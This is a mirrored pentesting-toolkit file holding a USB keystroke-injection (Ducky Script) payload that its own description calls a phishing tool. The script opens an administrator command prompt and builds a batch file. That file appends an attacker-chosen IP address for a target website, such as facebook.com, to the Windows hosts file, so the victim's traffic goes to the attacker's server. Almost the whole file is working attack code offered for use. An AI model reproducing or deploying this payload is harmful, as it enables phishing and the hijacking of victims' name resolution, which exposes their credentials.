mirror of
https://github.com/autistic-symposium/sec-pentesting-toolkit.git
synced 2025-08-03 20:24:25 -04:00
42 lines
No EOL
1.1 KiB
Text
42 lines
No EOL
1.1 KiB
Text
Used for phishing, it add's an ip of your choosing to the hosts file on windows, so when the user types into there web browser for example www.facebook.com it instead of going to the proper ip it goes to the one in the host file your evil one.
|
|
|
|
|
|
REM ---[Start CMD as administrator]-----------------------
|
|
GUI
|
|
DELAY 50
|
|
STRING cmd
|
|
DELAY 150
|
|
MENU
|
|
DELAY 75
|
|
STRING a
|
|
Enter
|
|
DELAY 200
|
|
LEFT
|
|
ENTER
|
|
STRING cls
|
|
ENTER
|
|
REM ---[END]----------------------------------------------
|
|
DELAY 300
|
|
REM ---[Inject into the host file]------------------------
|
|
STRING copy con inject.bat
|
|
ENTER
|
|
STRING SET NEWLINE=^& echo.
|
|
ENTER
|
|
ENTER
|
|
STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts
|
|
ENTER
|
|
STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts
|
|
ENTER
|
|
ENTER
|
|
STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts
|
|
ENTER
|
|
STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts
|
|
ENTER
|
|
CONTROL z
|
|
ENTER
|
|
STRING inject.bat
|
|
ENTER
|
|
REM ---[END]----------------------------------------------
|
|
DELAY 200
|
|
STRING exit
|
|
ENTER |